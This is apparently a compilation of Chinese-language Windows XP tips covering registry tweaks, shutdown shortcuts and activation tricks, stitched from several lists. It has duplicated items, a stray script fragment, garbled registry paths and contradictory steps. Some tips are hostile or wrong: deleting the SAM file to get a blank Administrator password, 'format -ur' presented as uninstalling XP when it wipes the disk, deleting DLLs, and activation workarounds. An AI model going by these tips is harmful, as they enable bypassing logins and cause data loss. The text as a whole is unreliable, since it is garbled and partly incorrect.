    虽然Windows XP系统运行非常稳定，但是有时操作不当，或者是其它原因，Windows XP也会“死机”。此时，无论你怎么按“CTRL+ALT+DEL”键它都不理睬你，此时只能按下Reset键重新启动系统。其实我们可以通过设置注册表，让Windows XP出现严重错误时自动重新启动系统。

    打开注册表编辑器，然后展开以下分支：“HKEY_LOCAL_MACHINE\SYSTEM
\CurrentControlSet\Control\CrashControl”，将右侧窗口中的“AutoReboot”键值的数据设置为“1”即可，这样在系统遇到严重错误时就会自动重新启动。

    7、删除系统多余的dll文件

    “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\sharedlls”记录共享的dll信息，后面的数字表示当前的dll文件被几个应用程序共享着，如果它的值是0的话，说明它是多余的，你尽可以把它给删除了

    8、临时文件会影响系统的性能

    进入“Internet 选项”中点“Internet临时文件夹”中的“设置”按钮，在打开对话框中点“移动文件夹”把Internet临时文件夹移到别的盘区，不要让它和系统文件处在同一盘区内，这是因为临时文件小、多、乱，会产生好多的碎片，如果让它和系统文件放在一起会影响到系统的性能。

    9、快速关闭一系列窗口

    用户通过“我的电脑”打开一个深层文件夹时，将依次打开很多窗口，逐一关闭颇麻烦。用户若在关闭最下一层窗口时按下Shift键，则所有的窗口将同时被关闭。若关闭中间某一层窗口时按下Shift键则其上层窗口都会被关闭，而下层窗口将保持不变

    微软公司这个回收站，时间长了，我们难免想给这个特殊对象取个另样的名称，要做到这一点并不难，只要我们打开注册表编辑器程序，并打开{HKEY_CLASSES_ROOT\CLSID\[645FF040-5081-101B-9F08-00AA002F954E>}分支，将其下的“回收站”改为自己喜欢的名称，如“垃圾筒”即可。到桌面上刷新一下，一个“垃圾筒”就出现在桌面上了

    10、删除不必要的程序

    在安装Win XP的时候，几乎都会选择安装全部程序，其实系统中有些程序没多大用。如果想删除没用的程序请执行以下操作步骤：单击“开始→控制面板→工具→文件夹选项”，在查看选项卡列表中的隐藏文件和文件夹分支下，点击“显示所有文件和文件夹”。如需编辑添加/删除Windows组件对话框，请执行以下操作步骤： 首先，为确保在必要时能够恢复到初始配置状态，请在开始操作前保留sysoc.inf文件(位于硬盘上\Windowst\inf\Sysoc.inf文件夹中)的一个备份，并为该备份指定一个不同的名称，如Sysoc2.inf。打开Sysoc.inf文件。该文件中的每一行文本代表一个能够在添加/删除Windows组件对话框显示的组件。例如:你可以把Pinball=ocgen.dll,OcEntry,pinball.inf,HIDE,7 改成Pinball=ocgen.dll,OcEntry,pinball.inf,,7 保存Sysoc.inf文件，随后，将其关闭并重新启动计算机。之后，你就可以在控制面板的“添加/删除”中删掉弹珠台游戏。 手续其实十分简单，对于那些希望在对话框中看到的组件，删除相应文本行中的单词HIDE(不要删除逗号)。但是要注意，这种方法不能删除Fax Services等Win核心组件。
  1、强行禁止文件属性修改
    要强行禁止文件属性修改，我们可以禁止用户在资源管理器中对文件或者文件夹的属性进行更改，具体方法是：

    选择“开始→运行→REGEDIT”，打开注册表编辑器，找到或新建“HKEY_CURRENT_USER\Software\Microsoft\Windows \CurrentVersion\Policies\Explorer”或“HKEY_LOCAL_Machine\Software\Microsoft\Windows \CurrentVersion\Policies\Explorer”分支，在右窗格中将“NoFileAssociate”(REG_DWORD型)的值改为1(1为不允许用户更改文件属性，0为允许用户更改文件属性)，完成后保存、退出注册表编辑器，重新启动计算机即可。

    2、Windows XP中快速复制文件

    和以前的操作系统相比，Windows XP“系统中资源管理器”工具栏比其他系统多了两个按钮——“复制到”和“移至”按钮，它们的功能是快速将选中的文件复制移动到指定文件夹。其实我们可以把这两项命令搬到右键菜单中。

    在“开始→运行”对话框中输入“Regedit”打开注册表，依次展开主键[HKEY_CLASSES_ROOTAllFilesystemObjectsshellexContextMenuHandlers ]，右键单击此主键，选择菜单“新建→项”，然后输入名称，名称可自定义，如“复制到”，再左键单击“复制到”主键，双击右窗口的“默认”，在弹出的“编辑字符串”对话框中输入“{C2FBB630-2971-11d1-A18C-00C04FD75D13}”。同法新建项“移至”，“移至”主键的“默认”键值赋值为“{C2FBB631-2971-11d1-A18C-00C04FD75D13}”即可。现在随便右键单击一个文件或者文件夹，你就会发现弹出的菜单多出了“复制到文件夹”和“移动到文件夹”两个菜单项，它们对应的就是“资源管理器”的“复制到”和“移至”功能。

    3、取消磁盘空间不够警告提示

    Windows XP会自动监控磁盘空间剩余量，一旦磁盘空间不足的话，会提示你挂起系统还原功能。如果要取消的话，就打开注册表编辑器，找到HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer，新建一个Dword值NoLowDiskSpaceChecks，然后修改为1即可。

    4、改变登录界面的背景色

    Windows XP在登录时会先显示一个浅蓝色的屏幕，即登录界面的背景色，想不想更改成其它的颜色。用下面的这个方面就可以了。

    打开注册表，找到“HKEY_USERS.DEFAULTControl PanelColor”，在窗口右边找到“Background”这个键值，会出现“编辑字符串”对话框，在“数值数据”下的框中输入你想要的颜色键值，“确定”后，重新启动系统即可。（系统默认值是58 110 165，白色为255 255 255，红色为255 0 0，黑色为000）。

    5、自动关闭电脑

    有些Windows XP系统在点击关闭电脑之后并不能自动关闭，而需像以前的AT电源一样手动关闭。这主要是Windows XP未启用高级电源管理。

    修正方法：点击“开始→控制面板→性能和维护→电源选项”。在弹出的电源选项属性设置窗口中，点击“高级电源管理”，将“启用高级电源管理支持”打上勾即可。

    6、加快系统启动速度

    如果你装的是Windows 9X和Windows XP双系统，系统启动时显示操作系统列表时间很长。右键单击“我的电脑”→“属性”→“高级”，在“启动和故障恢复”中点击“设置”，可以设置显示操作系统列表的时间，单击“编辑”也可以手动编辑启动选项，将timeout＝30改为timeout＝6即可。

    7、删除共享文档

    如果你不需要共享文件，可以这样移除它：进入HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Explorer My computer Namespace DelegateFolders，删除键值“”。

    8、解决Windows XP与软件不兼容问题

    Windows XP和Windows 98的内核有很大的差异，在Windows 98下可以安装运行的软件，在Windows XP下不一定能行。还好Windows XP有一个兼容模式来虚拟其他操作系统，它可以模拟Windows 95/98/2000等。

    方法是：将那些不能安装的软件的安装文件拖拽到Windows XP桌面上，然后用鼠标右键单击文件图标，选择“属性”选项，并选择需要的**作系统兼容模式，这样就可以正常安装软件了。

    9、改变“命令提式符”的默认目录

    在Windows XP中一般地，在我们启动“命令提式符”时，其默认的工作目录是：“C：Documents ang settings你机器名>”，要改变其工作目录，只需找到查看其“属性”。在弹出的“命令提式符”窗口里，将“ 工作目录”栏里的路径改变为自已想要的工作目录即可。

    10、停用“上次访问时间标记”

    不想要这项功能，可以这样修改：进入HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Control File system，新建DWORD值“NtfsDisableLastAccessUpdate”，将其值修改为“1”即可。

  1、让Win XP支持137 GB以上大硬盘

    想要使用137 GB以上大硬盘，必须使用48位LBA模式。首先你的主板BIOS必须支持48Bit LBA，其次Win XP家用版和专业版必须安装SP1补丁。然后打开注册表，在如下路径“HKEY_LOCAL_MACHINE System CurrentControlSet Services Atapi Parameter”找到“EnableBigLba”选项，将其值由“0”改为“1”。如果该项不存在，可以自建“DWORD值”项目，同样设置.最后重新启动即可。

    2、解决任务栏假死

    “控制面板”->“区域和语言选项”->“语言”->“详细信息”，在弹出的“设置窗口”中选择“首选项”的“语言栏”，关闭“在桌面上显示语言栏”，在第三项“在通知区域显示其他语言栏图标”复选框上打上勾。如果不需要手写识别、语音识别的话，也可以再勾选最后一项“关闭高级文字服务”。

    3、用SFC命令释放更多空间

    若确认系统不会新加入设备，可以把windows system dellcache目录内的文件予以删除或设定大小，以释放空间。

    删除全部文件的命令是sfc.exe/purgecache(sfc.exe/?查看命令参数的意义)，约300MB，本操作有危险性，对系统不熟悉者勿用。

    4、关闭系统备份

    （1）.“我的电脑”->“属性”->“高级”->“性能”->“设置”->“视觉效果”标签，选择“调整为最佳性能”；

    （2）.“我的电脑”->“属性”->“高级”->“性能”->“设置”->“高级”标签，“在处理器计划”选择“程序”，“内存使用”选“程序”，这样系统会给前台程序更多资源，使之运行更快；

    （3）.“虚拟内存”中点“更改”，将虚拟内存值设为物理内存的2.5倍，将初始大小和最大值值设为一样，将虚拟内存设置在系统盘外。比如你的内存是256M，你可以设置为640，操作系统安装在D盘，设置内存在C盘。

    5、禁止向微软报告错误

    如果正在运行的程序出现错误，就会有一个报告错误的窗口出现，询问是否要向Microsoft报告错误。关闭这个功能能节省时间，你可以禁用这个报告错误的功能，禁用该功能的步骤如下：

    在“控制面板”中打开“系统”；选择“高级”选项卡；点击“错误汇报”按钮；点击“禁用错误汇报”。点击“确定”确认修改；

    6、针对某种程序使用错误报告功能

    如果要针对不同的程序选择使用错误报告功能，设置步骤如下：

    在“错误汇报”窗口中，选择“启用错误汇报”，然后点击“选择程序”。

    在“选择程序”对话框中，选中“所有在列表中的程序”，然后选择要启用错误报告功能的程序。XP默认只提供两类程序供选择：Microsoft提供的程序，Windows组件。点击“添加”按钮可以向列表加入其他程序。

    7、恢复EXE文件关联

    EXE文件关联出错非常的麻烦，XP提供了安全模式下的命令行工具供我们使用，可以利用命令行工具来解决这个问题。

    在安全模式下输入：assoc<空格>.exe=exefile<回车>，屏幕上将显示“.exe=exefile”。现在关闭命令提示符窗口，按Ctrl+Alt+Del组合键调出“Windows安全”窗口，按“关机”按钮后选择“重新启动”选项，按正常模式启动Windows后，所有的EXE文件都能正常运行了！

    8、改变程序的超时限制

    当一个程序被挂起不再停止了响应，XP显示一个对话框询问是强制关闭该程序还是继续等待。默认情况下，只要程序有半秒没有应答，这个对话框就会出现。如果要修改XP等待程序响应的时间，按照如下步骤进行：

    打开HKEY_CURRENT_USER的\Control Panel\Desktop分支；找到HungAppTimeout值；修改HungAppTimeout值，例如10000(默认值是5000)。

    新设置的值必须在重新启动之后才能生效。

    9、禁止使用IE6下载文件

    有些时候我们需要禁止IE下载文件功能，但是一直苦于没有办法使用系统的设置，其实如果在注册表中稍作修改的话就可以满足大家的要求了。打开注册表编辑器，找到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3，然后在右边找到1803这个Dword值，双击修改为3即可。重新启动IE看看还能不能够下载的？如果要取消限制的话，只需要还原Dword值为0即可。

    10、Windows XP性能和视觉效果的平衡

    Windows XP操作系统具有许多特殊的视觉效果，这些特效丰富了Windows XP的用户界面的同时，它们也会给系统性能带来很大的负担。你可以关闭视觉效果，但也可以由系统决定启用哪些视觉效果，或者手工挑选要启动的视觉效果。操作步骤如下：

    右击“我的电脑”，选择“属性”，选择“高级”选项卡；点击“性能”区域的“设置”按钮，会出现一个“性能选项”对话框；根据对话框提示，启用或关闭各种视觉效果。

    1、任务栏显示快捷方式

    你可以把你经常用的文件夹和程序拖到任务栏上创建一个快捷方式。你可以在D盘上新建一个文件夹，将其命名为“任务栏文件夹”，将你常用的文件夹和常用程序快捷方式都放到这个文件夹中，然后在任务栏上单击鼠标右键，选择“工具栏”→“新建工具栏”→“系统任务栏”，单击“确定”后，这个工具栏就出现在任务栏上了。在默认情况下，将显示新建工具栏的图标、文字和标题。但可以只让它显示图标，方法为在任务栏上右击 去掉“显示标题”、“显示文字”两项前面的小钩。

    2、Win XP也玩文件夹背景

    在Windows XP以前，我们都可以设置文件夹背景，比如你打开一个文件夹，你可以设置一幅赏心悦目的背景图，这样会增加“XP”，但是Windows XP中却没有这项功能。其实背景的文件夹里都有个desktop.ini文件，我们可以通过修改desktop.ini文件来设置Windows XP文件夹背景。

    [ExtShellFolderViews]

    {BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}

    [{BE098140-A513-11D0-A3A4-00C04FD706EC}]

    Attributes=1

    IconArea_Image=E:19.jpg

    //这里设置你的背景图片的路径

    [.ShellClassInfo]

    ConfirmFileOp=0

  3、更改Windows XP序列号

    在Windows XP安装完毕以后，可能由于某些原因你又想在已经安装完毕的Windows XP上更改序列号，该怎么办呢？使用激活向导可以满足你的要求。

    注意：开始之前，建议你在修改之前作一个系统还原点，以免误操作引起不必要的麻烦。

    点击“开始”→“运行”，输入regedit后回车，打开注册表编辑器，定位到HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Current Version\WPAEvents，在右边右键单击OOBETimer，然后选择修改，至少修改一个字节，确定保存。

    点击“开始”→“运行”，输入%systemroot%\system32\oobe\msoobe.exe /a，选择通过电话激活以后点击“下一步”，点击修改序列号，输入新的序列号以后选择“更新”，如果退回到前一个画面，那么选择稍后激活，并重新启动，反复前面的步骤直到修改成功为止，重新激活。点击确定，安装SP1。

    如果你安装SP1以后不能重新启动，那么启动的时候按F8，选择使用“最后一次正确的配置”，然后重复以上流程。本方法适用于Windows XP Professional。

    4、自定义占用CPU的时间

    Windows XP为每一个正在运行的程序和进程定义了优先级，优先级决定了一个程序相对于其他程序而言的占用CPU时间的比值。Windows XP允许定义的优先级包括：低，低于标准，标准，高于标准，高，实时。

    大多数程序属于标准优先级。但是，你可以用任务管理器改变任意进程和程序的优先级。例如，如果你运行了大量的应用，可以让3D射击游戏占用较多的CPU资源，使游戏运行得更流畅。

    修改优先级的步骤如下：

    按Ctrl+Alt+Delete启动任务管理器。

    选择“进程”页。

    右键点击目标程序或进程，选择菜单“设置优先级”，然后选择适当的优先级。

    新的优先级只在程序或进程运行期间有效。如果结束程序再打开它，XP会重新为它设置默认的优先级。

    5、禁止报告脚本错误

    当IE遇到页面中的脚本错误时，它会报告错误。除非你在调试自己的程序，否则即使知道了错误的详细信息，也没有任何办法来改正错误。所以对大多数用户来说，报告脚本错误是一个中看不中用的功能。禁止浏览器报告脚本错误的办法如下：

    从IE的工具菜单选择“Internet选项”。

    选择“高级”选项卡。

    向下滚动列表，找到“浏览”区域。

    找到“禁止脚本调试”，选中前面的检查框。

    6、忘记登陆口令的解决办法

    Windows XP对用户安全性的审核即是非常严格的，大家知道，Windows XP中对用户帐户的安全管理使用了安全帐号管理器(Security Account Manager,SAM)的机制，安全帐号管理器对帐号的管理是通过安全标识进行的，安全标识在帐号创建时就同时创建，一旦帐号被删除，安全标识也同时被删除。安全标识是唯一的，即使是相同的用户名，在每次创建时获得的安全标识都时完全不同的。因此，一旦某个帐号被删除，它的安全标识就不再存在了，即使用相同的用户名重建帐号，也会被赋予不同的安全标识，不会保留原来的权限。

    安全账号管理器的具体表现就是%SystemRoot%\system32\config\sam文件。SAM文件是Windows NT/2000/XP的用户帐户数据库，所有用户的登录名及口令等相关信息都会保存在这个文件中。知道了这些我们的解决办法也产生了：在系统启动前，插入启动盘，进入C:\WINNT\System3\Config\，用ren命令将SAM文件改名，或用del命令将SAM文件删除，重启电脑即可。改名或删除SAM文件以后，试用Administrator登录，密码为空，成功了。

    7、将EFS选项添加至快捷菜单

    Windows XP所配备的加密文件系统(EFS)，可帮助您针对存储在NTFS磁盘卷上的文件和文件夹执行加密操作。如果您已将这个文件加密/解密选项添加至快捷菜单，那么，当用户右键单击某一存储于NTFS磁盘卷上的文件或文件夹时，加密或解密选项便会出现在随后弹出的快捷菜单上。请注意Windows XP Home Edition(家用版)并未提供EFS特性。

    如欲将EFS选项添加至快捷菜单，请依次执行下列操作步骤：在“运行”对话框内输入regedit，展开注册表至下列子键：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Exporer\Advanced，在“编辑”菜单上指向“新建”，并单击“DWORD值”，输入EncryptionContextMenu为变量名，并将该变量赋值为1。为确保对注册表进行修改，应在自己的计算机上拥有管理员帐号。

  8、Windows XP使用纯DOS

    在Windows XP中已经找不到纯DOS了，但利用下面的办法就可以让你在Windows XP中进入纯DOS模式。

    A：用Windows 98系统

    在安装XP操作系统前，先用Windows 98启动盘启动系统，并通过sys c:命令向c盘传送系统。并将常用的DOS命令拷贝到硬盘中，然后按常规方法安装XP，当安装成功后，在启动菜单的默认菜单"Microsoft Windows XP"下会新增一个“Microsoft Windows”菜单项，选中此菜单项后，由于系统中没有安装Windows98系统，所以此时计算机就会自动转到DOS系统下。

    B：用start命令

    在Windows XP的命令解释符中输入：start/seperate要运行的程序，即可运行相应的DOS程序。其中参数separate的作用是在单独的内存空间启动16位程序，而用参数shared则是在共享的内存空间启动16位程序。当DOS程序运行后我们还可按Alt+Enter键在全屏幕与窗口之间进行切换。

    9、去除Windows XP的随标提示

    为了用户使用方面，windows很早就有了提示，比如你的鼠标指到“开始”，它就会出现一个提示行：“单击这里开始”。这实际上是一个链接，我们使用时间长了就不需要它了，可是没有什么地方可是设置不显示提示，要知道这种提示都要占系统资源的，而我们并不需要这些提示，于是就到注册表编辑器里去搞定它：HKEY_CURRENT_USER>Control PanelDesktop>LameButton ,把它的键值改为0，然后注销一下（不行就重启），这些浪费资源的提示就没有了。

    10、安装Windows XP不用输序号

    要做到安装Windows XP不用输入序号要有一个前提，就是你的Windows XP原文件已经考到了你的硬盘上或者你的光盘是可读写的。方法如下：在I386的文件下放一个叫WINNT.SIF的， 内容如下：

    [UserData] ProductKey=*****-*****-*****-*****-*****

    //注意，上面的*号是你Windows XP的注册码

    [Data] AutoPartition=0

    MSDosInitiated=0

    UnattendedInstall=Yes

    [Unattended]

    UnattendMode=GuiAttended

    TargetPath=WINNT

    Hibernation=1

    OemPreinstall=No

    OemSkipEula=Yes

    CrashDumpSetting=0

    DisableDynamicUpdates=Yes

    UnattendSwitch=Yes

    1、用放大镜让桌面图文清晰可见　　Win XP在设计上考虑到了不同的人群，所以Win XP的附件下面有个“辅助工具”，方便听觉和视力差的人使用该操作系统。其实除了这些，任务栏本身就有一个放大镜工具（跟辅助工具里的那个是不一样的，那个是在桌面屏幕的上方显示的，面积大，而这个是在任务栏里显示的，面积小）。在任务栏上右击，选工具栏，在下级菜单中选择“taskbar magnifier”，然后任务栏右方就会出现一个“小方框”，里面有放大图（鼠标所指处），这个图象的放大倍数是可以自定义的，在“小方框”上点右键，在弹出的“zoom”子菜单里选择放大倍数。这个“小方框”很小，如果想大一点，可以拉宽任务栏。　　2、访问文件网页更方便　　右键点击任务栏的空白处，在弹出的菜单中选择“工具栏”，然后分别选择子菜单中的“地址”，“链接”和“桌面”。　　将这些工具放在任务栏可以方便很多，比如你要访问一个网站，可以直接在地址栏里键入网址（如果接上了internet的话），也可以在这里键入比如“D：\u8221”来直接访问各个磁盘，要读软驱就键入“A:\u8221”，要读光驱就直接键入“G:\u8221”（如果光驱时G的话），要发邮件吗？在地址栏里键入“mail toCode:
<SCRIPT language=javascript>document.write("");<script>
＋信箱地址”就可以了。链接的作用就不用讲了，大家都知道。那个叫桌面的东东可好用了，你访问文件（如果有很多文件，需要找的话），可以在这里找，这个“桌面”把所有文件都排成树形结构，所有文件及其结构都一目了然，方便了许多。　　你还可以直接访问网站，在一般情况下，当我们想登录到某网站时，都必须先启动Internet Explorer，其实，只要我们单击“开始”→“运行”（或者，win键＋R），并在“打开”项上直接输入网址，系统就会为你连接到相应的网站。如果你在系统中设置了自动拨号的话，它还会为你自动拨号，非常方便。　　3、一键完成网络诊断　　要进行网络诊断，你可以用命令提示符里的相关命令，比如ping，但这些诊断是不全的，要做一个完整的网络诊断，只有在Win XP的帮助中心才能实现，打开“开始”>“帮助与支持”，在其中找到网络诊断（用搜索搜一下，如果你找不到的话），只要按一下“扫描您的系统”，就可以完成所有的网络诊断，扫描完后，它会给出制作的很漂亮的报告（比命令提示符可好多了，这才叫xp（experience）吗），这个报告即给出了文字的结果，也给出了十分详细的数据，无论是一般用户，还是系统工程师都用的上它。　　4、关掉快速切换功能　　Win XP的一个很引人注目的功能叫做“快速切换”，这个功能为许多人在同一时间使用电脑提供了可能，但是要注意每一项功能总是伴随着资源的损失，如果你的内存少与64M，Win XP在装的时候就被自动禁止掉了，因为这样会使本来就已捉襟见肘的内存的压力更加大，对128M的用户来说，开这个功能虽然没什么关系，但是你又不是很需要这项功能，所以建议把这个功能给关掉。方法如下：控制面板>用户帐户，点击“更改用户登陆或注销方式”，去掉“使用快速用户切换”就可以了。5、优化程序运行

    程序运行有他们各自的优先次序，所有程序都要占用处理器资源，处理器处理任务有一个先后次序，一般的计算机中有31个优先等级，系统的内核占据了最高的一些等级，这样就能保证系统的稳定，而普通的应用程序一般在比较后面的等级。在普通应用程序中间也有优先次序，他们本来在处理器面前是人人平等的，但还是有些细微的差别，前台的程序（当前正在使用）的优先级要比后台的程序高。

    你可以自己调节应用程序的优先级，打开任务管理器，点到“进程”选项卡，选一个应用程序的进程，点击右键，会弹出一个快捷菜单，选择“设置优先级”，这里有6个等级：实时，高，高与标准，标准，低于标准，低。你可以让你的程序强行调度到更高或更低（自然为别的程序腾出了资源）的等级。如果你不知道某个应用程序的具体进程，可以如下操作：点到“应用程序”选项卡，右键点中一个任务，选择“转到进程”，就会转到该程序的进程，这样你就找到了该程序的进程了。

    6、给开始菜单上锁

    在Windows默认情况下，我们可以通过拖动的方法来定制符合自己习惯的“开始”菜单（比如你可以将“收藏夹”拖到“查找”的下面）。如果你不希望同事乱动你已经定制好的“开始”菜单，就应该为它上锁。

    点“开始——运行”，在“打开”对话框中填入“regedit"，再“确定”（下面皆同）打开注册表编辑器。在左窗口中找到\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer子键，再在右窗口中新建一个名为“NoChangStartMenu”的双字节值（DWORD），并将值修改为“1”。

    7、给控制面板上锁

    “控制面板”很重要，通过它你能设置输入法顺序，能修改Windows密码，也能添加/删除程序，当然更能造成Windows系统的崩溃，这可不是我们所希望的。怎么办？上锁呀！

    在左窗口中找到“\HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\InProcServer32”子键，将右窗口的“默认”项的数据“shell32.dll”的后面填上一个减号（一），使其变成“shell32.dll-”，如图所示。

    8、给我的电脑上锁

    如何有效、安全地保护你的文件呢？那就是给“我的电脑”上锁。

    方法同上，在左窗口中找到“\HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}InProcServer32”子键，将右窗口的“默认”项的数据“shell32.dll-”后填上一个减号（一），使其变成“shell32.dll”。

    9、快速拷贝文件

    如果你想过一段时间就把硬盘上的文件分类整理一下，把图片放在picture文件夹中，mp3文件放在music文件夹中等等，但来回复制、粘贴真的很烦琐，现在让我们用一个简单的方法快速拷贝文件。选中一个文件夹如music-点鼠标右键创建一个快捷方式-复制这个快捷方式-〉在SendTo文件夹中粘贴此快捷方式。

    SendTo是windowsXP的系统文件夹，“发送到”功能就是由它来实现的。现在我们选中任意一个mp3，点鼠标右键在发送到中选择“快捷方式到music”，这个mp3文件就被复制到了music文件夹中，是不是very easy！您还可以根据自己的需要制作software、txt、webpage等等，就看您的了！

    10.加快关机速度

    Windows XP的关机速度要慢于启动速度，特别有些任务还需要手工结束，更加延缓了关机速度。因此，要加快关机速度，首先要开启Windows XP的自动结束任务功能。具体步骤是：从注册表中找到“HKEY_CURRENT_USER\Control Panel\Desktop”，把“AutoEndTasks”的键值设置为1即可。

    然后再修改“HungAppTimeout”为“4000(或更小)”(预设为5000)，该键值同样也在“HKEY_CURRENT_USER\Control Panel\Desktop”下；最后一步再找到“HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\”，同样把WaitToKillServiceTimeout设置为“4000”；通过这样设置后的关机速度明显要加快了。

Windows XP八招简单实用技巧
    一、让欢迎窗口更清晰

    Windows XP使用了名为"ClearType"的清晰化技术，该技术特别让使用笔记本电脑及液晶显示器的用户在运行Windows XP操作系统时感受到与以往系统不同的效果。但由于该清晰效果只有当Windows启动完毕后才能调用，因此在系统启动过程中的欢迎窗口仍然无法实现这一效果。为了使欢迎窗口更加清晰，用户可以使用注册表编辑器进行修改，寻找到这两个主键：

    HKEY_USERS\.Default\Control Panel\Desktop\FontSmoothing

    HKEY_USERS\.Default\Control Panel\Desktop\FontSmoothingType

    将键值修改为“2”，这样便可以实现清晰显示效果了。

    二、让桌面文字没有阴影

    在以前版本的Windows中使用自己的Web桌面时，图标文字的下面都会有阴影，大大影响了桌面的视觉效果。其实我们可以通过修改Windows XP的设置来取消这种阴影。打开系统属性，然后在弹出的窗口中选择“高级”，再从“性能”框中点“设置”按钮，然后在“视觉效果”页中将“在桌面上为图标标签使用阴影”前面的方框中打上钩。好啦，看看桌面上的图标是不是已经没有了！这样既能获得好的视觉效果。

    三、解决任务栏假死

    “控制面板”->“区域和语言选项”->“语言”->“详细信息”，在弹出的“设置窗口”中选择“首选项”的“语言栏”，关闭“在桌面上显示语言栏”，在第三项“在通知区域显示其他语言栏图标”复选框上打上勾。如果不需要手写识别、语音识别的话，也可以再勾选最后一项“关闭高级文字服务”。

  四、让Windows XP进入DOS状态

    因为Windows XP不是基于DOS设计的，所以常规方法是不允许Windows XP进入DOS状态的，不过Windows XP有一个支持仿DOS命令行的环境，在其中可以运行大部分的DOS命令，甚至许多DOS下的游戏软件也可以运行，它就是Windows XP的恢复控制台。首先将Windows XP安装盘放入光驱，然后在运行中输入“F:/i386winnt32.exe/cmdcons”，F表示光驱盘符。确定后开始安装，安装好后重新启动计算机，在操作系统选择菜单中会多“Windows XP Recovery Console”选项，通过它就可进入系统故障恢复控制台了。

    五、用Shutdown．exe关机

    Shutdown.exe在C:\Windows\system32文件夹中（C盘为系统盘）。我们可以在桌面上为它建立快捷方式来快速关机，方法如下：先建立快捷方式，然后点击右键，选择“属性”，在“目标”文本框的路径后添加“-s -t 10”。其中“-s”代表关闭计算机，当然可以改为“-r”变成重新启动；“-t”表示设定倒计时，即后面的数字10表示10秒，可根据自己需要设定。

    另外还有一个“-c 关机显示的提示信息”，即允许设定关机时显示的提示信息，但不能超过127个字符。

    六、查看上网时间

    在Windows XP中，我们可以通过“事件查看器”来查看我们过去的上网时间，方法如下：打开“控制面板”，双击“管理工具”，然后打开“事件查看器”，在左边的窗口中选择“系统”，单击鼠标右键，在弹出的快捷菜单中选择“属性”，在“系统属性”窗口中选择“筛选器”标签，在“事件来源”中选择“RemoteAccess”，单击“确定”按钮，回到“事件查看器”主窗口，在右边的窗口中就会显示出上网的开始时间和结束时间，相邻的两个时间中较早的就是你上网的开始时间，较晚的则是你下网的时间，你还可以单击鼠标右键，选择“导出列表”，把它们导入到一个单独的文件中。

    七、修改最大分组数

    在Windows XP中新增了与分组相似的任务栏按钮，分组只有在任务栏上显示过多窗口而导致任务栏排列拥挤时才会激活，这时有关一个程序的所有打开的文档全部组合到任务栏上的一个按钮中。我们可以通过注册表来设置当某个窗口达到一定数量，再激活该功能，打开注册表编辑器，依次找到HKEY_CURRENT_Software＼Microsoft＼Windows＼CurrentVersion＼Explorer＼Advanced子键，新建双字节键值项TaskbarGroupSize，并为其赋值。

    八、让IE窗口每次打开都是最大化

    通过快捷方式启动IE，例如通过快速启动工具栏中的图标启动IE时，您可以右击“快捷方式图标”，选择“属性”，在“快捷方式”选项卡中的“运行方式”选项栏中选择“最大化”，然后单击“确定”按钮。此后，无论什么时候您通过这个快捷方式启动IE，浏览器的窗口总处于最大化状态。

    通过桌面的“Internet Explorer”图标启动IE时，因为这不是一个标准的快捷方式，所以没有最大化选项。幸运的是，这个图标可以记住最近一次您使用浏览器的窗口的设置情况。因此，如果当您退出IE前将窗口最大化，那么下次启动IE时仍然会保持此次退出时的窗口设置。

  1. 重装Windows XP不需再激活

    如果你需要重装Windows XP，通常必须重新激活。事实上只要在第一次激活时，备份好Windows\System32目录中的Wpa.dbl文件，就不用再进行激活的工作了。在重装Windows XP后，只需要复制该文件到上面的目录即可。

    2. 如何知道自己的Windows XP是否已激活

    打开开始→运行，在弹出的对话框中输入：oobe/msoobe /a，回车后系统会弹出窗口告诉你系统是否已经激活。

    3. 关闭zip文件夹功能

    你是不是觉得Windows XP中的zip文件夹功能太慢，功能也不吸引人？如果是这样，你可以打开开始→运行，在弹出的对话框中输入：regsvr32 /u zipfldr.dll，回车后即可关闭ZIP文件夹功能。

    4.让Windows XP也能刻ISO文件

    Windows XP没有提供直接刻录ISO文件的功能，不过你可以下载一个第三方插件来为系统增加这个功能。该插件的下载地址为：http://members.home.net/alexfein/is...rderSetup.msi。

    5. 登陆界面背景变变色

    打开注册表编辑器，找到[HKEY-USERS\.DEFAULT\Control Panel\Colors]，将Background的值改为“0 0 0”（不带引号），这样登录背景就成了黑色。

    6.完全卸载XP

    有些朋友在安装Windows XP后发现自己并不喜欢这个操作系统，这时你可以用Windows 98安装光盘启动到DOS状态，然后键入：
    format -ur

    这样可以删除所有XP的文件，并可重新安装Windows 98/Me。

  7. 系统救命有稻草

    当怀疑系统重新启动之前针对计算机所进行的更改可能导致故障，可以在启动系统时按F8键，选择“最后一次正确的配置”来恢复对系统所做的更改。

    8. 恢复硬件以前的驱动程序

    在安装了新的硬件驱动程序后发现系统不稳定或硬件无法工作时，只需在“设备管理器”中选择“驱动程序恢复”按钮，即可恢复到先前正常的系统状态。但不能恢复打印机的驱动程序。

    9. 自动登陆

    单击开始→运行，输入“rundll32netplwiz.dll，UsersRunDll”（不带引号），然后在User Accounts中取消“Users must enter a user name and password to use this computer”，单击“OK”，接着在弹出的对话框中输入你想自己登陆的用户名和密码即可。

    10.快速关机或重启的快捷键（可定时）

    在桌面点击鼠标右键，选择新建(快捷方式，在弹出的向导中输入位置为：C:\WINDOWS\system32\shutdown.exe -s -t 10（其中的-s可以改为-r，也就是重新启动，而-t 10表示延迟10秒，你可以根据自己的需要更改这个数字）。制作完这个快捷键后，按照上面的方法为它指定一个图标。这个快速关机或重启的技巧会显示一个比较漂亮的对话框提示关机（重启），而且你可以在后面加上“-c "我要关机啦！"”，这样这句话会显示在对话框中，当然文字你可以随意写，但要注意不能超过127个字符。

    11.关机、重启只要1秒钟

